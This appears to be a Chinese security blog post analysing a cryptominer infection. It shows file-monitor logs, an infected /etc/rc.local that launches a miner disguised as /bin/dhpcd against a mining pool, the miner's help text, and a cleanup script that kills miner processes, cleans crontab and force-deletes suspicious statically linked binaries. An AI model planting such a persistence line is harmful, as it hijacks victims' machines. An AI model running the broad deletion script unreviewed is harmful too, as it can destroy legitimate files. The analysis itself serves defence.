INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:55.468209 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:55.611614 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:55.782594 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:55.947091 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:56.086717 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:56.267656 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:56.444056 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:56.619012 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:56.777156 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:56.921299 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:57.114877 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:57.267230 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:57.420870 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:57.588299 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:57.770619 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:57.933107 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:58.073582 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:58.258056 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:58.423030 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:58.599916 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:58.765426 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:58.914629 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:59.080883 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:59.242431 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:59.419305 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:59.584976 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:59.722322 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:59.911820 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:00.603662 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:00.747130 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:00.862070 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:00.888740 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:00.965000 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:01.152583 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:01.340117 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:01.464616 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:01.727373 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:01.882114 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:02.021524 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:02.231538 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:02.577823 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:03.012116 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:03.425070 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:03.815753 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:04.202723 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:04.674746 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:04.956017 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:05.388042 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:05.752932 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:06.136062 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:06.535232 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:06.918982 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:07.376316 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:07.713961 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:08.104982 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:08.473439 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:08.886292 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:09.239495 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:09.646030 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:10.044261 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:10.384033 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:15:10.469870 INFO:root:MODIFY event : /etc/rc.local 2019-03-20 15:15:38.510660 INFO:root:MODIFY event : /run/sshd.pid 2019-03-20 15:15:44.673229 INFO:root:MODIFY event : /run/sshd.pid 2019-03-20 15:15:44.673907
# cat /etc/rc.local #!/bin/sh -e # # rc.local # # This script is executed at the end of each multiuser runlevel. # Make sure that the script will "exit 0" on success or any other # value on error. # # In order to enable or disable this script just change the execution # bits. # # By default this script does nothing. /bin/dhpcd -o ca.minexmr.com:4444 -t1 --safe -B >/dev/null 2>/dev/null exit 0
root@92ae08a47348:/opt# ./dhpcd -h
Usage: xmrig [OPTIONS]
Options:
-a, --algo=ALGO specify the algorithm to use
cryptonight
-o, --url=URL URL of mining server
-O, --userpass=U:P username:password pair for mining server
-u, --user=USERNAME username for mining server
-p, --pass=PASSWORD password for mining server
--rig-id=ID rig identifier for pool-side statistics (needs pool support)
-t, --threads=N number of miner threads
-v, --av=N algorithm variation, 0 auto select
-k, --keepalive send keepalived packet for prevent timeout (needs pool support)
--nicehash enable nicehash.com support
--tls enable SSL/TLS support (needs pool support)
--tls-fingerprint=F pool TLS certificate fingerprint, if set enable strict certificate pinning
-r, --retries=N number of times to retry before switch to backup server (default: 5)
-R, --retry-pause=N time to pause between retries (default: 5)
--cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
--cpu-priority set process priority (0 idle, 2 normal to 5 highest)
--no-huge-pages disable huge pages support
--no-color disable colored output
--variant algorithm PoW variant
--donate-level=N donate level, default 5% (5 minutes in 100 minutes)
--user-agent set custom user-agent string for pool
-B, --background run the miner in the background
-c, --config=FILE load a JSON-format configuration file
-l, --log-file=FILE log all output to a file
-S, --syslog use system log for output messages
--max-cpu-usage=N maximum CPU usage for automatic threads mode (default 75)
--safe safe adjust threads and av settings for current CPU
--asm=ASM ASM code for cn/2, possible values: auto, none, intel, ryzen, bulldozer.
--print-time=N print hashrate report every N seconds
--api-port=N port for the miner API
--api-access-token=T access token for API
--api-worker-id=ID custom worker-id for API
--api-id=ID custom instance ID for API
--api-ipv6 enable IPv6 support for API
--api-no-restricted enable full remote access (only if API token set)
--dry-run test configuration and exit
-h, --help display this help and exit
-V, --version output version information and exit
2019-03-22
#!/bin/bash
export LC_ALL=C
oldPATH="$PATH"
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
post_run_file=`mktemp`
test "$post_run_file" || post_run_file=/tmp/tmp.post_run_file.$$
sed -i '/\/etc\/cron\.hourly\/\(gcc\|cron\)\.sh/d' /etc/crontab
rm -f /etc/cron.hourly/gcc.sh /etc/cron.hourly/gcc4.sh /lib/libudev.so /root/pty /tmp/bash /dev/shm/bash /var/tmp/bash /var/lock/bash /var/run/bash /bin/httpsd /lib/udev/udev /lib/udev/debug /root/sysem /root/systma /etc/jourxlv /tmp/sysem /tmp/su /tmp/ddgs.*
rm -rf /tmp/.xm /root/.system /tmp/.iokb21 /var/tmp/... /tmp/.tmp /usr/cpu/bin '/var/tmp/ ' /tmp/.X12-unix /var/tmp/." " /tmp/.mountfs /tmp/seconfig /root/.ttp
chattr -i /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ceurnad
chattr -i -a /usr/local/sbin/t /usr/local/sbin/rsync
rm -f /usr/local/sbin/t /usr/local/sbin/rsync /etc/ceurnad
pkill -9 -f 'python /bin/httpsd' # order of args matters on some systems
pkill -9 xm32
pkill -9 xm64
pkill -9 ceurnad
pkill -9 .xmrig
pkill -9 -f /tmp/.xs/daemon.i686.mod
pkill -9 -f ./systma
pkill -9 -f /root/.local/syslogd
pkill -9 -f /tmp/samba
pkill -9 xorgg
pkill -9 sc64u
pkill -9 -f /tmp/su
if cd /etc/cron.hourly ; then
for f in *;do
grep -e 'cp "/bin/'${f%.sh}'" "/bin/' -e 'cp "/usr/bin/'${f%.sh}'" "/usr/bin/' "$f" && rm -f "$f"
done
fi
crontab -l | grep -v 'wget .*sh' | grep -v 'curl .*sh' | grep -v '/pty .*/dev/null' | crontab -
if which file ; then
#find ${PATH//:/ } | while read f; do file "$f";done | grep \
find ${oldPATH//:/ } | xargs file | grep \
'statically linked' | cut -d: -f1 | grep -v -e '/mbchk$' \
-e 'dump' -e 'kube' -e ngrok -e iscsistart -e '_ctl$' -e fsck -e '/minidlnad$' \
-e docker -e xenstore -e wine -e nsenter -e importenv -e aide -e shadowsocks \
-e mount -e 'bin/bcm\.user' -e partclone -e drbl-chntpw -e '/crictl$' \
-e '/helm$' -e etcdctl -e '/e3$' -e raid -e agent -e 'print' -e '/isamchk$' \
-e '/mysql' -e '/mdadm$' -e '/jq$' -e '/usr/sbin/redhat_lsb_trigger\.' \
-e '/pfmon' -e '/pfdbg' -e '/packer$' -e '/dns-rebind$' -e '/sz$' -e '/retpan$' \
-e '/gshelld$' -e 'helper$' -e '\.backup$' -e '/ffmpeg$' -e '/rar$' \
-e '/unhide' -e '/rebind$' -e '/v2ctl$' -e '/unace$' -e '/resume$' \
-e '/tw_cli$' -e '/MegaCli$' -e '/lsiutil$' -e '/start$' -e '/fbi$' \
-e 'cobol$' -e '/pack_isam$' -e '/myisa' -e '/isamlog$' -e '/perror$' \
-e 'track' -e 'monitor' -e geckodriver -e '/koolshare' -e '/wipefs$' \
-e wrapper -e replace -e resolveip -e server -e '/ethos-id$' \
-e '/gofmt$' \
-e '/v2ray$' -e '/gitlab-runner$' -e '/hdsfusemnt$' -e '/qtvagent$' \
-e '/xvbeat$' \
-e '/grub$' -e '\.static$' -e '\.old$' | grep -v -F \
-e '/usr/bin/valgrind' \
-e '/usr/sbin/tzdata-update' \
-e '/sbin/busybox' \
-e '/sbin/cryptsetup' \
-e '/sbin/dump' \
-e '/sbin/e2fsck' \
-e '/sbin/fsck.ext2' \
-e '/sbin/fsck.ext3' \
-e '/sbin/ldconfig' \
-e '/sbin/mpath_ctl' \
-e '/sbin/nash' \
-e '/sbin/restore' \
-e '/sbin/rmt' \
-e '/sbin/sln' \
-e '/bin/sln' \
-e '/usr/sbin/build-locale-archive' \
-e '/usr/sbin/glibc_post_upgrade.i686' \
-e '/usr/sbin/glibc_post_upgrade.x86_64' \
-e '/usr/sbin/libgcc_post_upgrade' \
-e '/usr/sbin/prelink' \
-e '/usr/sbin/plesk' \
-e '/usr/bin/wine64-preloader' \
-e '/usr/bin/wine-preloader' \
-e '/bin/busybox' \
-e '/bin/dhpcd' \
-e '/mpath_prio_' \
-e '/usr/sbin/sas2ircu' \
-e '/usr/bin/rar' \
-e '/usr/bin/rlpdump' \
-e '/usr/bin/oracle' \
-e '/sbin/init' \
-e /usr/bin/netserve \
-e /sbin/auibusy \
-e '/sbin/auplink' \
-e /sbin/aumvdown \
-e '/usr/local/bin/sas2ircu' \
-e '/usr/local/bin/sas3ircu' \
-e '/usr/sbin/glibc_post_upgrade' \
-e '/sbin/discover' \
-e '/usr/bin/jad' | while read ff;do
chattr -i "$ff"
# rm -vi "$ff"</dev/tty
rm -f "$ff"
if echo "$ff" | grep '/ps$' ; then
echo 'yum -y install procps || yum -y reinstall procps || apt-get install --reinstall procps' >>$post_run_file
fi
if echo "$ff" | grep '/ss$' ; then
echo 'yum -y install iproute || yum -y reinstall iproute || apt-get install --reinstall iproute' >>$post_run_file
fi
if echo "$ff" | grep '/lsof$' ; then
echo 'yum -y install lsof || yum -y reinstall lsof || apt-get install --reinstall lsof' >>$post_run_file
fi
if echo "$ff" | grep '/netstat$' ; then
echo 'yum -y install net-tools || yum -y reinstall net-tools || apt-get install --reinstall net-tools' >>$post_run_file
fi
done
fi
echo More checks:
ls -l /proc/*/exe 2>/dev/null | grep -e /tmp -e /dev -e /var -e '\./' -e /usb_bus
if which file ; then
for l in /proc/*/exe;do file "`readlink -f $l`" | grep -e 'statically linked' -e 'too many section header sections' && echo $l;done
fi
echo 'top -bn1 | head -n 20:'
top -bn1 | head -n 20
echo atq:
atq
echo 'crontab -l:'
crontab -l
echo /etc/crontab:
cat /etc/crontab
echo /etc/cron.hourly:
ls -la /etc/cron.hourly
echo /etc/cron.d:
ls -la /etc/cron.d
set -x
. $post_run_file
rm $post_run_file
来源:freebuf.com 2019-03-23 18:36:50 by: 陌度
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册